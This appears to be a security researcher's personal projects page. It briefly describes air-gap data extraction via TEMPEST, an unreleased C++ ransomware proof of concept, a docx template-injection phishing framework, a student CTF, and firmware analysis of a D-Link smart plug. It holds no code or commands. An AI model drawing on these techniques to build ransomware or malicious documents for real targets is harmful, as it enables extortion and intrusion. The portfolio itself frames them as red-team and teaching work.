Projects

Current Projects

During a project about extracting data from an air-gapped computer using TEMPEST and sound, I was inspired by the pleasantness of electricity. Using my monitor as an analog synth, and some Python to generate a synth sequence, I'm mixing some tracks together for a sounds of electromagnetic radiation album. Some of them sound surprisingly like music. Finished project along with production details available here.

I wrote a piece of ransomware in C++ 17 using only the native Windows API as a proof of concept. The point of this is not to introduce more ransomware into the world, but to build a framework for quick red team customization. This one obviously stays unreleased.

I developed a social engineering framework based on malicious Word document distribution. This differs from SET in that it specializes in one and only one attack. The exploit is well explained here, but in short injects a malicious template into a docx. We go through this trouble because most networks filter .doc and .docm files as inherently malicious. This framework attempts to maintain simplicity while still being powerful enough. One such use may be an IT team testing the efficacy of their security awareness training sessions.

I put on a CTF geared towards high school students for three years. There were there categories of flags ranging from easy to hard. Flags could be found in decoded morse code, the strings of a binary, or on a website requiring the Wayback Machine. Points were all handled using PHP and a basic SQL database. I later wrote an email verification process to grant access to a discussion board. I wrote the code for the frontend, backend, and database, as well as each flag.

I was reverse engineering "smart" device firmware, in this case, the D-Link DSP-W215. This is a smart plug that can be controlled via Alexa, Google Assistant, or a smartphone. The features include being able to turn a plug on or off remotely, monitoring temperature, and monitoring energy usage. D-Link makes life nice by publishing all of their firmware online for anyone to download. Binwalk made quick work of extracting the filesystem and I was able to get to work. The first file I opened, soapclient.js was reliant on a strange protocol HNAP (Home Network Administration Protocol). After doing some googling, it was apparent that device shared the same class of vulnerability that most devices reliant on HNAP did. I started looking at CVEs within this class of vulnerability and found one that mentioned this device by name. I did a bit more research on the firmware including some MIPS32 emulation using QEMU and wrote up a paper that won't quite fit here, but using HNAP was far from the only design flaw.